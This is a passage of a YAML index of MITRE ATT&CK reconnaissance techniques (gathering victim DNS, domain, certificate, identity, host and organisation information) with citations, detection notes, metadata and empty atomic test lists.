Engines](https://attack.mitre.org/techniques/T1593/002), breach dumps, code repositories, etc.).(Citation: Register Deloitte)(Citation: Register Uber)(Citation: Detectify Slack Tokens)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleHog)(Citation: GitHub Gitrob)(Citation: CNET Leaks) Adversaries may also purchase credentials from dark web or other black-markets. Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)). + id: attack-pattern--bc76d0a4-db11-4551-9ac4-01a469cfb161 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: reconnaissance + modified: '2020-10-27T02:27:31.090Z' + created: '2020-10-02T14:55:43.815Z' + x_mitre_contributors: + - Vinayak Wadhwa, Lucideus + - Lee Christensen, SpecterOps + - Toby Kohlenberg + x_mitre_detection: |- + Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. + + Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access. + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_platforms: + - PRE + atomic_tests: [] + T1590.002: + technique: + external_references: + - source_name: mitre-attack + external_id: T1590.002 + url: https://attack.mitre.org/techniques/T1590/002 + - source_name: DNS Dumpster + url: https://dnsdumpster.com/ + description: Hacker Target. (n.d.). DNS Dumpster. Retrieved October 20, 2020. + - source_name: Circl Passive DNS + url: https://www.circl.lu/services/passive-dns/ + description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS. + Retrieved October 20, 2020. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: DNS + description: |- + Before compromising a victim, adversaries may gather information about the victim's DNS that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts. + + Adversaries may gather this information in various ways, such as querying or otherwise collecting details via [DNS/Passive DNS](https://attack.mitre.org/techniques/T1596/001). DNS information may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596), [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593), or [Active Scanning](https://attack.mitre.org/techniques/T1595)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)). + id: attack-pattern--0ff59227-8aa8-4c09-bf1f-925605bd07ea + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: reconnaissance + modified: '2020-10-24T04:02:39.701Z' + created: '2020-10-02T15:47:10.102Z' + x_mitre_detection: |- + Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. + + Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access. + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_platforms: + - PRE + atomic_tests: [] + T1596.001: + technique: + external_references: + - source_name: mitre-attack + external_id: T1596.001 + url: https://attack.mitre.org/techniques/T1596/001 + - source_name: DNS Dumpster + url: https://dnsdumpster.com/ + description: Hacker Target. (n.d.). DNS Dumpster. Retrieved October 20, 2020. + - source_name: Circl Passive DNS + url: https://www.circl.lu/services/passive-dns/ + description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS. + Retrieved October 20, 2020. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: DNS/Passive DNS + description: |- + Before compromising a victim, adversaries may search DNS data for information about victims that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts. + + Adversaries may search DNS data to gather actionable information. Threat actors can query nameservers for a target organization directly, or search through centralized repositories of logged DNS query responses (known as passive DNS).(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Adversaries may also seek and target DNS misconfigurations/leaks that reveal information about internal networks. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)). + id: attack-pattern--17fd695c-b88c-455a-a3d1-43b6cb728532 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: reconnaissance + modified: '2020-10-24T04:19:40.584Z' + created: '2020-10-02T16:57:45.044Z' + x_mitre_detection: |- + Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. + + Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access. + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_platforms: + - PRE + atomic_tests: [] + T1591.001: + technique: + external_references: + - source_name: mitre-attack + external_id: T1591.001 + url: https://attack.mitre.org/techniques/T1591/001 + - source_name: ThreatPost Broadvoice Leak + url: https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/ + description: Seals, T. (2020, October 15). Broadvoice Leak Exposes 350M Records, + Personal Voicemail Transcripts. Retrieved October 20, 2020. + - source_name: DOB Business Lookup + url: https://www.dobsearch.com/business-lookup/ + description: Concert Technologies . (n.d.). Business Lookup - Company Name + Search. Retrieved October 20, 2020. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Determine Physical Locations + description: |- + Before compromising a victim, adversaries may gather the victim's physical location(s) that can be used during targeting. Information about physical locations of a target organization may include a variety of details, including where key resources and infrastructure are housed. Physical locations may also indicate what legal jurisdiction and/or authorities the victim operates within. + + Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Physical locations of a target organization may also be exposed to adversaries via online or other accessible data sets (ex: [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594) or [Social Media](https://attack.mitre.org/techniques/T1593/001)).(Citation: ThreatPost Broadvoice Leak)(Citation: DOB Business Lookup) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Hardware Additions](https://attack.mitre.org/techniques/T1200)). + id: attack-pattern--ed730f20-0e44-48b9-85f8-0e2adeb76867 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: reconnaissance + modified: '2020-10-24T04:09:48.419Z' + created: '2020-10-02T16:32:33.126Z' + x_mitre_detection: |- + Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. + + Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access. + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_platforms: + - PRE + atomic_tests: [] + T1596.003: + technique: + external_references: + - source_name: mitre-attack + external_id: T1596.003 + url: https://attack.mitre.org/techniques/T1596/003 + - source_name: SSLShopper Lookup + url: https://www.sslshopper.com/ssl-checker.html + description: SSL Shopper. (n.d.). SSL Checker. Retrieved October 20, 2020. + - source_name: Medium SSL Cert + url: https://medium.com/@menakajain/export-download-ssl-certificate-from-server-site-url-bcfc41ea46a2 + description: Jain, M. (2019, September 16). Export & Download — SSL Certificate + from Server (Site URL). Retrieved October 20, 2020. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Digital Certificates + description: |- + Before compromising a victim, adversaries may search public digital certificate data for information about victims that can be used during targeting. Digital certificates are issued by a certificate authority (CA) in order to cryptographically verify the origin of signed content. These certificates, such as those used for encrypted web traffic (HTTPS SSL/TLS communications), contain information about the registered organization such as name and location. + + Adversaries may search digital certificate data to gather actionable information. Threat actors can use online resources and lookup tools to harvest information about certificates.(Citation: SSLShopper Lookup) Digital certificate data may also be available from artifacts signed by the organization (ex: certificates used from encrypted web traffic are served with content).(Citation: Medium SSL Cert) Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)). + id: attack-pattern--0979abf9-4e26-43ec-9b6e-54efc4e70fca + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: reconnaissance + modified: '2020-10-24T04:19:15.289Z' + created: '2020-10-02T16:58:58.738Z' + x_mitre_detection: |- + Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. + + Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access. + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_platforms: + - PRE + atomic_tests: [] + T1590.001: + technique: + external_references: + - source_name: mitre-attack + external_id: T1590.001 + url: https://attack.mitre.org/techniques/T1590/001 + - source_name: WHOIS + url: https://www.whois.net/ + description: NTT America. (n.d.). Whois Lookup. Retrieved October 20, 2020. + - source_name: DNS Dumpster + url: https://dnsdumpster.com/ + description: Hacker Target. (n.d.). DNS Dumpster. Retrieved October 20, 2020. + - source_name: Circl Passive DNS + url: https://www.circl.lu/services/passive-dns/ + description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS. + Retrieved October 20, 2020. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Domain Properties + description: |- + Before compromising a victim, adversaries may gather information about the victim's network domain(s) that can be used during targeting. Information about domains and their properties may include a variety of details, including what domain(s) the victim owns as well as administrative data (ex: name, registrar, etc.) and more directly actionable information such as contacts (email addresses and phone numbers), business addresses, and name servers. + + Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about victim domains and their properties may also be exposed to adversaries via online or other accessible data sets (ex: [WHOIS](https://attack.mitre.org/techniques/T1596/002)).(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596), [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593), or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)). + id: attack-pattern--e3b168bd-fcd7-439e-9382-2e6c2f63514d + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: reconnaissance + modified: '2020-10-25T22:58:22.915Z' + created: '2020-10-02T15:46:24.670Z' + x_mitre_detection: |- + Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. + + Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access. + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_platforms: + - PRE + atomic_tests: [] + T1589.002: + technique: + external_references: + - source_name: mitre-attack + external_id: T1589.002 + url: https://attack.mitre.org/techniques/T1589/002 + - source_name: HackersArise Email + url: https://www.hackers-arise.com/email-scraping-and-maltego + description: Hackers Arise. (n.d.). Email Scraping and Maltego. Retrieved + October 20, 2020. + - source_name: CNET Leaks + url: https://www.cnet.com/news/massive-breach-leaks-773-million-emails-21-million-passwords/ + description: Ng, A. (2019, January 17). Massive breach leaks 773 million email + addresses, 21 million passwords. Retrieved October 20, 2020. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Email Addresses + description: |- + Before compromising a victim, adversaries may gather email addresses that can be used during targeting. Even if internal instances exist, organizations may have public-facing email infrastructure and addresses for employees. + + Adversaries may easily gather email addresses, since they may be readily available and exposed via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: HackersArise Email)(Citation: CNET Leaks) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Email Accounts](https://attack.mitre.org/techniques/T1586/002)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)). + id: attack-pattern--69f897fd-12a9-4c89-ad6a-46d2f3c38262 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: reconnaissance + modified: '2020-10-24T03:46:04.662Z' + created: '2020-10-02T14:56:24.866Z' + x_mitre_detection: |- + Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. + + Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access. + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_platforms: + - PRE + atomic_tests: [] + T1589.003: + technique: + external_references: + - source_name: mitre-attack + external_id: T1589.003 + url: https://attack.mitre.org/techniques/T1589/003 + - source_name: OPM Leak + url: https://www.opm.gov/cybersecurity/cybersecurity-incidents/ + description: Cybersecurity Resource Center. (n.d.). CYBERSECURITY INCIDENTS. + Retrieved October 20, 2020. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Employee Names + description: |- + Before compromising a victim, adversaries may gather employee names that can be used during targeting. Employee names be used to derive email addresses as well as to help guide other reconnaissance efforts and/or craft more-believable lures. + + Adversaries may easily gather employee names, since they may be readily available and exposed via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: OPM Leak) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)). + id: attack-pattern--76551c52-b111-4884-bc47-ff3e728f0156 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: reconnaissance + modified: '2020-10-24T03:46:29.173Z' + created: '2020-10-02T14:57:15.906Z' + x_mitre_detection: |- + Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. + + Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access. + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_platforms: + - PRE + atomic_tests: [] + T1592.003: + technique: + external_references: + - source_name: mitre-attack + external_id: T1592.003 + url: https://attack.mitre.org/techniques/T1592/003 + - source_name: ArsTechnica Intel + url: https://arstechnica.com/information-technology/2020/08/intel-is-investigating-the-leak-of-20gb-of-its-source-code-and-private-data/ + description: Goodin, D. & Salter, J. (2020, August 6). More than 20GB of Intel + source code and proprietary data dumped online. Retrieved October 20, 2020. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Firmware + description: |- + Before compromising a victim, adversaries may gather information about the victim's host firmware that can be used during targeting. Information about host firmware may include a variety of details such as type and versions on specific hosts, which may be used to infer more information about hosts in the environment (ex: configuration, purpose, age/patch level, etc.). + + Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about host firmware may only be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices).(Citation: ArsTechnica Intel) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190)). + id: attack-pattern--b85f6ce5-81e8-4f36-aff2-3df9d02a9c9d + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: reconnaissance + modified: '2020-10-24T03:52:36.854Z' + created: '2020-10-02T16:46:42.537Z' + x_mitre_detection: |- + Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. + + Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access. + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_platforms: + - PRE + atomic_tests: [] + T1592: + technique: + external_references: + - source_name: mitre-attack + external_id: T1592 + url: https://attack.mitre.org/techniques/T1592 + - source_name: ATT ScanBox + url: https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks + description: 'Blasco, J. (2014, August 28). Scanbox: A Reconnaissance Framework + Used with Watering Hole Attacks. Retrieved October 19, 2020.' + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Gather Victim Host Information + description: |- + Before compromising a victim, adversaries may gather information about the victim's hosts that can be used during targeting. Information about hosts may include a variety of details, including administrative data (ex: name, assigned IP, functionality, etc.) as well as specifics regarding its configuration (ex: operating system, language, etc.). + + Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about hosts may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)). + id: attack-pattern--09312b1a-c3c6-4b45-9844-3ccc78e5d82f + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: reconnaissance + modified: '2020-10-24T03:53:39.351Z' + created: '2020-10-02T16:39:33.966Z' + x_mitre_detection: |- + Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. + + Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access. + x_mitre_version: '1.0' + x_mitre_is_subtechnique: false + x_mitre_platforms: + - PRE + atomic_tests: [] + T1589: + technique: + external_references: + - source_name: mitre-attack + external_id: T1589 + url: https://attack.mitre.org/techniques/T1589 + - source_name: OPM Leak + url: https://www.opm.gov/cybersecurity/cybersecurity-incidents/ + description: Cybersecurity Resource Center. (n.d.). CYBERSECURITY INCIDENTS. + Retrieved October 20, 2020. + - source_name: Register Deloitte + url: https://www.theregister.com/2017/09/26/deloitte_leak_github_and_google/ + description: 'Thomson, I. (2017, September 26). Deloitte is a sitting duck: + Key systems with RDP open, VPN and proxy ''login details leaked''. Retrieved + October 19, 2020.' + - source_name: Register Uber + url: https://www.theregister.com/2015/02/28/uber_subpoenas_github_for_hacker_details/ + description: McCarthy, K. (2015, February 28). FORK ME! Uber hauls GitHub + into court to find who hacked database of 50,000 drivers. Retrieved October + 19, 2020. + - source_name: Detectify Slack Tokens + url: https://labs.detectify.com/2016/04/28/slack-bot-token-leakage-exposing-business-critical-information/ + description: Detectify. (2016, April 28). Slack bot token leakage exposing + business critical information. Retrieved October 19, 2020. + - source_name: Forbes GitHub Creds + url: https://www.forbes.com/sites/runasandvik/2014/01/14/attackers-scrape-github-for-cloud-service-credentials-hijack-account-to-mine-virtual-currency/#242c479d3196 + description: Sandvik, R. (2014, January 14). Attackers Scrape GitHub For Cloud + Service Credentials, Hijack Account To Mine Virtual Currency. Retrieved + October 19, 2020. + - source_name: GitHub truffleHog + url: https://github.com/dxa4481/truffleHog + description: Dylan Ayrey. (2016, December 31). truffleHog. Retrieved October + 19, 2020. + - source_name: GitHub Gitrob + url: https://github.com/michenriksen/gitrob + description: 'Michael Henriksen. (2018, June 9). Gitrob: Putting the Open + Source in OSINT. Retrieved October 19, 2020.' + - source_name: CNET Leaks + url: https://www.cnet.com/news/massive-breach-leaks-773-million-emails-21-million-passwords/ + description: Ng, A. (2019, January 17). Massive breach leaks 773 million email + addresses, 21 million passwords. Retrieved October 20, 2020. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + description: |- + Before compromising a victim, adversaries may gather information about the victim's identity that can be used during targeting. Information about identities may include a variety of details, including personal data (ex: employee names, email addresses, etc.) as well as sensitive details such as credentials. + + Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about victims may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: OPM Leak)(Citation: Register Deloitte)(Citation: Register Uber)(Citation: Detectify Slack Tokens)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleHog)(Citation: GitHub Gitrob)(Citation: CNET Leaks) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)). + name: Gather Victim Identity Information + id: attack-pattern--5282dd9a-d26d-4e16-88b7-7c0f4553daf4 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: reconnaissance + modified: '2020-10-27T02:27:31.387Z' + created: '2020-10-02T14:54:59.263Z' + x_mitre_detection: |- + Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. + + Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access. + x_mitre_version: '1.0' + x_mitre_is_subtechnique: false + x_mitre_platforms: + - PRE + atomic_tests: [] + T1590: + technique: + external_references: + - source_name: mitre-attack + external_id: T1590 + url: https://attack.mitre.org/techniques/T1590 + - source_name: WHOIS + url: https://www.whois.net/ + description: NTT America. (n.d.). Whois Lookup. Retrieved October 20, 2020. + - source_name: DNS Dumpster + url: https://dnsdumpster.com/ + description: Hacker Target. (n.d.). DNS Dumpster. Retrieved October 20, 2020. + - source_name: Circl Passive DNS + url: https://www.circl.lu/services/passive-dns/ + description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS. + Retrieved October 20, 2020. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Gather Victim Network Information + description: |- + Before compromising a victim, adversaries may gather information about the victim's networks that can be used during targeting. Information about networks may include a variety of details, including administrative data (ex: IP ranges, domain names, etc.) as well as specifics regarding its topology and operations. + + Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about networks may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199)). + id: attack-pattern--9d48cab2-7929-4812-ad22-f536665f0109 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: reconnaissance + modified: '2020-10-25T22:58:23.086Z' + created: '2020-10-02T15:45:17.628Z' + x_mitre_detection: |- + Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. + + Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access. + x_mitre_version: '1.0' + x_mitre_is_subtechnique: false + x_mitre_platforms: + - PRE + atomic_tests: [] + T1591: + technique: + external_references: + - source_name: mitre-attack + external_id: T1591 + url: https://attack.mitre.org/techniques/T1591 + - source_name: ThreatPost Broadvoice Leak + url: https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/ + description: Seals, T. (2020, October 15). Broadvoice Leak Exposes 350M Records, + Personal Voicemail Transcripts. Retrieved October 20, 2020. + - source_name: DOB Business Lookup + url: https://www.dobsearch.com/business-lookup/ + description: Concert Technologies . (n.d.). Business Lookup - Company Name + Search. Retrieved October 20, 2020. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Gather Victim Org Information + description: |- + Before compromising a victim, adversaries may gather information about the victim's organization that can be used during targeting. Information about an organization may include a variety of details, including the names of divisions/departments, specifics of business operations, as well as the roles and responsibilities of key employees. + + Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about an organization may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: ThreatPost Broadvoice Leak)(Citation: DOB Business Lookup) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)). + id: attack-pattern--937e4772-8441-4e4a-8bf0-8d447d667e23 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: reconnaissance + modified: '2020-10-24T04:10:36.479Z' + created: '2020-10-02T16:27:02.339Z' + x_mitre_detection: |- + Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. + + Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access. + x_mitre_version: '1.0' + x_mitre_is_subtechnique: false + x_mitre_platforms: + - PRE + atomic_tests: [] + T1592.001: + technique: + external_references: + - source_name: mitre-attack + external_id: T1592.001 + url: https://attack.mitre.org/techniques/T1592/001 + - source_name: ATT ScanBox + url: https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks + description: 'Blasco, J. (2014, August 28). Scanbox: A Reconnaissance Framework + Used with Watering Hole Attacks. Retrieved October 19, 2020.' + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Hardware + description: |- + Before compromising a victim, adversaries may gather information about the victim's host hardware that can be used during targeting. Information about hardware infrastructure may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive 